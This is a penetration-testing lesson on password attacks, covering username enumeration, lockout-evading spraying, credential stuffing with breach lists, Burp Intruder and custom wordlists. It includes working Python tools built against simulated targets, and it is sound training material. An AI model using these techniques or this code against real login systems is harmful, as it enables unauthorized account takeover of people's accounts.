
Despite the prevalence of sophisticated attacks, gaining unauthorized access often comes down to compromising passwords. This lesson covers practical techniques for attacking password-based authentication systems, from identifying vulnerabilities to successfully gaining access.
Before attacking an account, you need to confirm it exists. Many applications inadvertently reveal valid usernames through different error messages. An error like "Invalid password" for valid usernames versus "Account does not exist" for invalid ones allows attackers to compile lists of valid accounts.
Test the login form with both valid and invalid usernames and compare the responses carefully. Look beyond the displayed message: compare response timing, status codes, redirects, and response length. Timing differences are common because many applications only run the (deliberately slow) password-hash comparison when the username exists, so an unknown user gets a faster answer. Such subtle differences often reveal the distinction even when the error text is identical.
Registration and password reset flows provide additional enumeration vectors. "This email is already registered" during signup confirms an account exists. Password reset might respond differently for valid versus invalid addresses. Each endpoint needs examination for information disclosure.
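The comparison described above can be automated. The following is an added example, not code from the original lesson: it probes each candidate username several times with a junk password, builds a fingerprint (status codes, body length, median latency) and flags any candidate whose fingerprint differs from a baseline username that certainly does not exist. The `simulated_login` target is a constructed stand-in (assumption) that reproduces the common defect of an early return for unknown users; point `enumerate_users` at a real `login(username, password)` callable to use it against a scoped target.

```python
import statistics
import time
from dataclasses import dataclass
from typing import Any, Callable, Dict, List

# ---- Constructed stand-in for a login endpoint (assumption, not a real target) ----
# It reproduces a common defect: the "unknown user" path returns early (no hash
# comparison, so it is faster) and its error body has a different length than the
# "known user, wrong password" path, even though both say "Invalid credentials".
_KNOWN_USERS = {"alice": "hunter2", "bob": "Summer2024!"}


@dataclass
class Response:
    status: int
    body: str
    elapsed: float  # seconds


def simulated_login(username: str, password: str) -> Response:
    start = time.perf_counter()
    if username not in _KNOWN_USERS:
        status, body = 401, '{"error":"Invalid credentials"}'
    else:
        time.sleep(0.02)  # stands in for a slow password-hash verification
        if _KNOWN_USERS[username] == password:
            status, body = 200, '{"ok":true}'
        else:
            status, body = 401, '{"error":"Invalid credentials","retry":true}'
    return Response(status, body, time.perf_counter() - start)


# ---- Enumeration logic: compare each candidate against a known-invalid baseline ----
LoginFn = Callable[[str, str], Response]


def fingerprint(login: LoginFn, username: str, samples: int) -> Dict[str, Any]:
    """Probe one username several times with a junk password and summarise
    the status codes seen, the body length and the median latency."""
    timings, lengths, statuses = [], [], set()
    for _ in range(samples):
        r = login(username, "definitely-not-the-password-7f3c")
        timings.append(r.elapsed)
        lengths.append(len(r.body))
        statuses.add(r.status)
    return {
        "median_ms": statistics.median(timings) * 1000.0,
        "length": max(lengths),
        "statuses": statuses,
    }


def enumerate_users(
    login: LoginFn,
    candidates: List[str],
    baseline_user: str = "zz-no-such-user-9f3a1c",  # assumed not to exist
    samples: int = 5,
    timing_threshold_ms: float = 5.0,
) -> Dict[str, List[str]]:
    """Return {username: [reasons]} for every candidate whose response
    fingerprint differs from the baseline in status, length or latency."""
    base = fingerprint(login, baseline_user, samples)
    found: Dict[str, List[str]] = {}
    for user in candidates:
        fp = fingerprint(login, user, samples)
        reasons = []
        if fp["statuses"] != base["statuses"]:
            reasons.append(f"status {sorted(fp['statuses'])} vs {sorted(base['statuses'])}")
        if fp["length"] != base["length"]:
            reasons.append(f"body length {fp['length']} vs {base['length']}")
        if abs(fp["median_ms"] - base["median_ms"]) > timing_threshold_ms:
            reasons.append(
                f"median latency {fp['median_ms']:.1f} ms vs {base['median_ms']:.1f} ms"
            )
        if reasons:
            found[user] = reasons
    return found


if __name__ == "__main__":
    for user, why in enumerate_users(simulated_login, ["alice", "carol", "bob"]).items():
        print(f"{user}: {'; '.join(why)}")
```

Several samples per username and a median (rather than a single request) keep network jitter from producing false positives; raise `timing_threshold_ms` on a noisy link.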
With valid usernames identified, the actual password attack begins. Password spraying tests one or a few common passwords against many accounts. Because each account sees only one failed attempt per round, this avoids lockouts that trigger after a number of consecutive failures on a single account; pace the rounds so that no account exceeds the lockout threshold within the policy's observation window. Testing "Password123" or "Summer2024" across a thousand accounts often yields results.
Credential stuffing uses previously breached username/password combinations. Data breaches regularly expose millions of credentials, and users frequently reuse passwords across sites. Obtain credential lists from breach databases and systematically test them against your target.
Brute-force attacks try many passwords against a single account. This traditional approach works when no account lockout exists, or when the lockout is ineffective or can be reset. Attack speed depends on rate limiting: some applications permit unlimited attempts while others add delays or lockouts after a handful of failures.
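The difference between spraying and per-account brute force comes down to how failures accumulate per account. This added example (not from the original lesson) models a target with a lockout policy behind a fake clock, a spray scheduler that rotates passwords across all accounts and waits out the observation window before any account can reach the threshold, and a naive per-account brute force that trips the lockout. The `LockoutTarget` class and its credentials are constructed assumptions; the threshold and window values stand in for whatever policy you discover during testing.

```python
from collections import defaultdict, deque
from typing import Deque, Dict, Iterable, List, Optional


class LockoutTarget:
    """Constructed stand-in for an authentication service (assumption, not a real
    product): an account locks once it has `threshold` failed logins inside any
    `window_s`-second window. Time is a fake clock so the demo runs instantly."""

    def __init__(self, creds: Dict[str, str], threshold: int = 3, window_s: int = 900):
        self.creds = creds
        self.threshold = threshold
        self.window_s = window_s
        self.failures: Dict[str, Deque[float]] = defaultdict(deque)
        self.locked: set = set()
        self.now = 0.0
        self.requests = 0

    def advance(self, seconds: float) -> None:
        self.now += seconds

    def login(self, user: str, password: str) -> str:
        """Return 'ok', 'fail' or 'locked'."""
        self.requests += 1
        if user in self.locked:
            return "locked"
        if self.creds.get(user) == password:
            return "ok"
        q = self.failures[user]
        q.append(self.now)
        while q and self.now - q[0] > self.window_s:  # forget failures outside the window
            q.popleft()
        if len(q) >= self.threshold:
            self.locked.add(user)
            return "locked"
        return "fail"


def password_spray(
    target: LockoutTarget,
    users: Iterable[str],
    passwords: List[str],
    max_per_window: int,
    window_s: int,
) -> Dict[str, str]:
    """Try each password against every account before moving to the next password.
    After every `max_per_window` passwords, wait out the lockout window so that no
    single account ever accumulates `threshold` failures inside one window.
    Use max_per_window = threshold - 1 for the policy you discovered."""
    found: Dict[str, str] = {}
    pending = list(users)
    for i, pw in enumerate(passwords):
        if i and i % max_per_window == 0:
            target.advance(window_s + 1)
        still_pending = []
        for user in pending:
            if target.login(user, pw) == "ok":
                found[user] = pw
            else:
                still_pending.append(user)
        pending = still_pending
    return found


def brute_force_single(target: LockoutTarget, user: str, passwords: List[str]) -> Optional[str]:
    """Naive per-account brute force: every attempt lands on the same account."""
    for pw in passwords:
        result = target.login(user, pw)
        if result == "ok":
            return pw
        if result == "locked":
            return None  # account is now locked; further attempts are wasted and noisy
    return None


if __name__ == "__main__":
    creds = {"alice": "Summer2024", "bob": "Welcome1", "carol": "correct-horse-battery"}
    wordlist = ["Password123", "Summer2024", "Welcome1", "Spring2024"]

    spray_target = LockoutTarget(creds, threshold=3, window_s=900)
    print("spray found:", password_spray(spray_target, creds, wordlist, 2, 900))
    print("locked after spray:", spray_target.locked)

    bf_target = LockoutTarget(creds, threshold=3, window_s=900)
    print("brute force on carol:", brute_force_single(bf_target, "carol", wordlist))
    print("locked after brute force:", bf_target.locked)
```

Against a real target the `advance` call becomes an actual sleep, which is why a spray over a large user list is slow by design: the wait is per round, not per account.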
Burp Suite's Intruder tool provides an excellent platform for credential attacks. Configure the login request as a template, mark the username and password fields as payload positions, and load your wordlists. The attack types map onto the strategies above: sniper takes one payload set and substitutes it into one position at a time (a password list against one known user); pitchfork walks one list per position in lockstep (breached username:password pairs for credential stuffing); cluster bomb tries every combination of the lists (a full brute force of users against passwords); battering ram puts the same payload into every position at once.
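To make the difference between the attack types concrete, here is an added example (not Burp's code and not from the original lesson) that reproduces the four payload-placement strategies as Python generators over a captured form request. `BASE_FIELDS`, the position names and the payload lists are constructed assumptions; `render` serialises a request as a form-encoded POST body, which is what Intruder would send.

```python
import itertools
from typing import Dict, Iterable, Iterator, List, Sequence
from urllib.parse import urlencode

Request = Dict[str, str]

# Constructed example: the login request as captured, as a dict of form fields.
# The fields listed in POSITIONS are the payload positions; the rest are sent as-is.
BASE_FIELDS: Request = {"username": "test", "password": "test", "remember": "0"}
POSITIONS: List[str] = ["username", "password"]


def sniper(base: Request, positions: Sequence[str], payloads: Iterable[str]) -> Iterator[Request]:
    """Sniper: one payload set, one position at a time; other positions keep their
    base value. Requests = len(positions) * len(payloads)."""
    for pos in positions:
        for p in payloads:
            yield {**base, pos: p}


def battering_ram(base: Request, positions: Sequence[str], payloads: Iterable[str]) -> Iterator[Request]:
    """Battering ram: the same payload in every position at once (e.g. username ==
    password). Requests = len(payloads)."""
    for p in payloads:
        yield {**base, **{pos: p for pos in positions}}


def pitchfork(base: Request, positions: Sequence[str], payload_sets: Sequence[Sequence[str]]) -> Iterator[Request]:
    """Pitchfork: one payload set per position, walked in lockstep and stopping at the
    shortest set. This is the credential-stuffing shape: i-th user with i-th password."""
    for combo in zip(*payload_sets):
        yield {**base, **dict(zip(positions, combo))}


def cluster_bomb(base: Request, positions: Sequence[str], payload_sets: Sequence[Sequence[str]]) -> Iterator[Request]:
    """Cluster bomb: Cartesian product of the sets, every user with every password.
    Requests = product of the set sizes, so it grows fast."""
    for combo in itertools.product(*payload_sets):
        yield {**base, **dict(zip(positions, combo))}


def render(fields: Request) -> str:
    """Serialise a request as an application/x-www-form-urlencoded body."""
    return urlencode(fields)


def count(requests: Iterable[Request]) -> int:
    return sum(1 for _ in requests)


if __name__ == "__main__":
    users = ["alice", "bob", "carol"]
    passwords = ["Password123", "Summer2024", "Welcome1", "Spring2024"]
    print("sniper (password only):", count(sniper(BASE_FIELDS, ["password"], passwords)))
    print("sniper (both positions):", count(sniper(BASE_FIELDS, POSITIONS, passwords)))
    print("battering ram:", count(battering_ram(BASE_FIELDS, POSITIONS, passwords)))
    print("pitchfork:", count(pitchfork(BASE_FIELDS, POSITIONS, [users, passwords])))
    print("cluster bomb:", count(cluster_bomb(BASE_FIELDS, POSITIONS, [users, passwords])))
    print("first pitchfork body:", render(next(pitchfork(BASE_FIELDS, POSITIONS, [users, passwords]))))
```

The request counts are the point: with a thousand users and a thousand passwords, cluster bomb issues a million requests while pitchfork issues a thousand, which is why breached pairs are tested with pitchfork and a spray is usually run as a cluster bomb with a very short password list.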
Hydra and similar command-line tools offer high-speed, parallelized attacks when Burp's throughput is insufficient. These tools support numerous protocols beyond HTTP form logins (SSH, FTP, SMB, RDP and SMTP among others), making them versatile for attacking authentication across services.
Wordlist quality significantly impacts success rates. Generic lists like rockyou contain common passwords but miss organization-specific patterns. Consider what passwords users might choose—company names, location names, current year, and common patterns all deserve inclusion in your customized wordlists.
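The customization described above is easy to script. This added example (not from the original lesson) builds a targeted wordlist from organization-specific terms and seasons, applying the capitalization, leetspeak, year and suffix patterns users typically reach for, filtering out anything the target's password policy would have rejected at registration (such attempts only waste lockout budget), and ordering the output most-likely-first so a spray tries the best guesses before pausing. The term list, years and policy are constructed assumptions.

```python
from typing import Dict, Iterable, List, Tuple

# Substitutions users commonly apply to satisfy "must contain a digit/symbol" rules.
LEET = str.maketrans({"a": "@", "e": "3", "i": "1", "o": "0", "s": "$"})
SEASONS = ("Spring", "Summer", "Autumn", "Fall", "Winter")
SUFFIXES = ("", "!", "1", "123", "#", "!!")  # in order of likelihood (assumption)


def passes_policy(candidate: str, min_len: int = 8, need_upper: bool = True, need_digit: bool = True) -> bool:
    """Drop candidates the target's policy would never have accepted."""
    if len(candidate) < min_len:
        return False
    if need_upper and not any(c.isupper() for c in candidate):
        return False
    if need_digit and not any(c.isdigit() for c in candidate):
        return False
    return True


def generate_wordlist(
    org_terms: Iterable[str],
    years: Iterable[str],
    include_seasons: bool = True,
    leetspeak: bool = True,
    **policy,
) -> List[str]:
    """Return unique candidates ordered most-likely-first: most recent year (pass
    `years` in priority order), shortest suffix, Capitalised stem, with leetspeak
    variants ranked last. Keyword arguments are forwarded to passes_policy."""
    terms = list(org_terms) + (list(SEASONS) if include_seasons else [])
    ranked: Dict[str, Tuple[int, int, int]] = {}
    for term in terms:
        variants = [(0, term.capitalize()), (1, term.lower()), (2, term.upper())]
        if leetspeak:
            variants += [(rank + 3, stem.translate(LEET)) for rank, stem in list(variants)]
        for yi, year in enumerate(list(years) + [""]):
            for si, suffix in enumerate(SUFFIXES):
                for vr, stem in variants:
                    cand = f"{stem}{year}{suffix}"
                    if not passes_policy(cand, **policy):
                        continue
                    rank = (yi, si, vr)
                    if cand not in ranked or rank < ranked[cand]:
                        ranked[cand] = rank  # keep the best rank for duplicates
    return sorted(ranked, key=ranked.get)


if __name__ == "__main__":
    # Constructed input: a fictional company "Acme" in Springfield, current year first.
    for candidate in generate_wordlist(["Acme", "Springfield"], ["2024", "2023"])[:15]:
        print(candidate)
```

For a spray, take only the first few entries of this list per round; the full list is what you feed a per-account brute force or an offline hash-cracking job.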
Successfully compromising a password is only the beginning. Document the credential immediately and verify its validity through legitimate login. Check the account's privilege level—you might have compromised an administrator rather than a regular user.
Explore what the compromised account can access. Look for credential reuse opportunities where the same password might work on other systems. Search for additional credentials stored in the account—password managers, configuration files, or email containing password reset links.
Remember ethical boundaries. During authorized testing, access only what your scope permits. Document findings for your client rather than pursuing access beyond what's agreed.
Review questions:
What is the term for systematically trying many passwords against an account?
What tool parallelizes remote login attempts?
What defense disables accounts after repeated failures?
What Burp Suite tool automates web attacks?